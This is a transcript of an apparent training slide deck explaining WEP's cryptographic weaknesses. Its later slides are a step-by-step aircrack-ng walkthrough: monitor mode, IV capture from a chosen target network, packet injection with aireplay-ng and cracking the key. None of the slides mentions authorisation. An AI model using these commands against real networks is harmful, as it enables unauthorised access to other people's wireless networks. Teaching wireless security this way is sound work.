Presentation is loading. Please wait.

Presentation is loading. Please wait.

Wireless Attacks: WEP Module Type: Basic Method Module Number: 0x00

Published byOlivia Neal Modified over 6 years ago

Similar presentations

Presentation on theme: "Wireless Attacks: WEP Module Type: Basic Method Module Number: 0x00"— Presentation transcript:

1 Wireless Attacks: WEP Module Type: Basic Method Module Number: 0x00
Last Updated: Author: Hermit

2 Topics Common Terminology What is WEP? How is WEP Vulnerable?
The Attack: Step by Step Additional resources

3 Common Terminology Wireless Local Area Network (WLAN)
A network that is connected wirelessly instead of with physical cables. Clients communicate with access points (AP), which relay traffic to external networks. Defined by the specification. Radio Frequency (RF) An electromagnetic wave, such as AM or FM radio. When referring to WLANs we use pre-defined values called channels, numbered from 1 through 14 Initialization Vector (IV) A number intended to be used only once as a random seed (alongside a common secret) in cryptography, to uniquely encode data. IVs are also sometimes called “nonces” (meaning “used only once”).

4 Common Terminology The specification defines seven modes for wireless network devices: Master: Act as an AP Managed: Act as a client Monitor: Monitor all traffic, not just one network, without associating first Promiscuous: Pass all traffic to the CPU, does require associating first, but allows injection back into associated networks Ad-hoc: There is no central AP or infrastructure. Each device communicates directly with each other device. Ad-hoc and mesh are not exclusive. Mesh: Each device can relay/route packets for other devices, but devices do not communicate directly with each other. Repeater: Act as a ”dumb” repeater and retransmit received signals.

5 Common Terminology Service Set Identifier (SSID) Basic SSID (BSSID)
The human readable “friendly” name of a WLAN. Basic SSID (BSSID) The MAC address of an AP. Extended SSID (ESSID) A collection of BSSIDs, functionally considered equivalent to an SSID.

6 What is WEP? Wired Equivalency Privacy (WEP) is a security protocol for WLANs, which suffers from a variety of cryptographic and design weaknesses. It was part of the a specification, but is now completely deprecated. It uses either a 64-bit or 128-bit key, each of which includes a 24-bit IV. 64 bit = 24 bit IV + 40 bit secret key 128 bit = 24 bit IV bit secret key It uses the RC4 stream cipher to encrypt. It is useless from a security perspective and easily cracked.

7 How is WEP Vulnerable? RC4 depends upon a truly random key, but WEP uses RC4 with a fixed pre-shared key (of 40 or 104 bits) and a very small IV or nonce (of 24 bits). Since the majority of each encryption is done using the same value, only a portion of the encryption must be recovered. In the worst case scenario using modern attacks, it only takes around 50,000 IV captures to completely recover the key because the IV will be reused. Even worse, the design of WEP allows an attacker to modify a captured packet to “just ask” for more packets which will assist in decrypting.

8 Attack Setup This assumes that you have a 2016 release of Kali Linux installed, as well as hardware capable of being put into monitor mode. If in doubt, get an Alfa card. All commands are expected to be run with superuser (i.e. root) privileges. The aircrack-ng suite is expected to be part of the installation.

9 The Attack: Step by Step (Overview)
Open a terminal window. Kill any potentially conflicting applications/services. Identify your wireless device. Put your wireless device into monitor mode. Verify monitor mode. Identify target network. Begin packet capture from target network. (optional) Stimulate IV collection. Crack WEP shared key.

10 The Attack: Step 1 Open a terminal window… no graphics here, because if you can’t do this part then the rest of this guide is really beyond you.

11 The Attack: Step 2 Kill any potentially conflicting applications/services. airmon-ng check kill

12 The Attack: Step 3 Identify your wireless device (we’ll use “wlan0” for this tutorial) ifconfig -a

13 The Attack: Step 4 Put your wireless device into monitor mode.
airmon-ng start wlan0

14 The Attack: Step 5 Verify monitor mode. ifconfig -a

15 The Attack: Step 6 Identify target network (write down SSID, channel, and BSSID) airodump-ng wlan0mon

16 The Attack: Step 7 Begin packet capture from target network.
airodump-ng --channel {#} --ivs --bssid {BSSID} -w wep-file wlan0mon

17 The Attack: Step 8 (optional) Stimulate IV collection. Run this in a separate terminal window while leaving the other programs executing: aireplay-ng -2 -b {BSSID} -t 1 -c FF:FF:FF:FF:FF:FF -p 0481 wlan0mon

18 The Attack: Step 9 Crack WEP shared key (your file name will vary based upon how many times you have started the capture). aircrack-ng wep-file-01.ivs Leave this running and it will automatically retry whenever a new candidate IV capture threshold is reached until the key is recovered.

19 Questions?

20 Additional Resources Technical overview of WEP/WPA cracking methods:
Hermit

Download ppt "Wireless Attacks: WEP Module Type: Basic Method Module Number: 0x00"

Similar presentations

Overview How to crack WEP and WPA

Overview How to crack WEP and WPA
Crack WEP Lab Last Update 2014.08.12 1.1.0 1Copyright 2014 Kenneth M. Chipps Ph.D. www.chipps.com.

Crack WEP Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
Wireless Cracking By: Christopher Zacky.

Wireless Cracking By: Christopher Zacky.
IEEE 802.11i IT443 Broadband Communications Philip MacCabe October 5, 2005

IEEE i IT443 Broadband Communications Philip MacCabe October 5, 2005
Crack WPA Lab Last Update 2014.06.11 1.0.0 1Copyright 2014 Kenneth M. Chipps Ph.D. www.chipps.com.

Crack WPA Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
CSE 6590 1.  Wired Equivalent Privacy (WEP) ◦ first security protocol defined in 802.11  Wi-Fi Protected Access (WPA) ◦ defined by Wi-Fi Alliance 

CSE  Wired Equivalent Privacy (WEP) ◦ first security protocol defined in  Wi-Fi Protected Access (WPA) ◦ defined by Wi-Fi Alliance 
WLAN Security: Cracking WEP/WPA

WLAN Security: Cracking WEP/WPA
Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.

Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.
1 MD5 Cracking One way hash. Used in online passwords and file verification.

1 MD5 Cracking One way hash. Used in online passwords and file verification.
Wireless Networks: Signaling and Security William Tucker CEN 4516: Computer Networks FGCU: Fort Myers, FL: 09/05.

Wireless Networks: Signaling and Security William Tucker CEN 4516: Computer Networks FGCU: Fort Myers, FL: 09/05.
Wireless LAN Security Jerry Usery CS 522 December 6 th, 2006.

Wireless LAN Security Jerry Usery CS 522 December 6 th, 2006.
The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens.

The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens.
Wireless Network Security: WEP And Beyond Heidi Parsaye Jason DeVries Roxanne Ilse Heidi Parsaye - Jason DeVries - Roxanne Ilse.

Wireless Network Security: WEP And Beyond Heidi Parsaye Jason DeVries Roxanne Ilse Heidi Parsaye - Jason DeVries - Roxanne Ilse.
Wired Equivalent Privacy (WEP)

Wired Equivalent Privacy (WEP)
Vulnerability In Wi-Fi By Angus U CS 265 Section 2 Instructor: Mark Stamp.

Vulnerability In Wi-Fi By Angus U CS 265 Section 2 Instructor: Mark Stamp.
802.11 Wireless Security Presentation by Paul Petty and Sooner Brooks-Heath.

Wireless Security Presentation by Paul Petty and Sooner Brooks-Heath.
WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.

WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.
© 2006 Cisco Systems, Inc. All rights reserved.Cisco PublicITE I Chapter 6 1 Wireless Technologies Networking for Home and Small Businesses – Chapter 7.

© 2006 Cisco Systems, Inc. All rights reserved.Cisco PublicITE I Chapter 6 1 Wireless Technologies Networking for Home and Small Businesses – Chapter 7.
WLAN What is WLAN? Physical vs. Wireless LAN

WLAN What is WLAN? Physical vs. Wireless LAN
© 2013 The McGraw-Hill Companies, Inc. All rights reserved Mike Meyers’ CompTIA A+ ® Guide to 802: Managing and Troubleshooting PCs Fourth Edition (Exam.

© 2013 The McGraw-Hill Companies, Inc. All rights reserved Mike Meyers’ CompTIA A+ ® Guide to 802: Managing and Troubleshooting PCs Fourth Edition (Exam.

Similar presentations

Ads by Google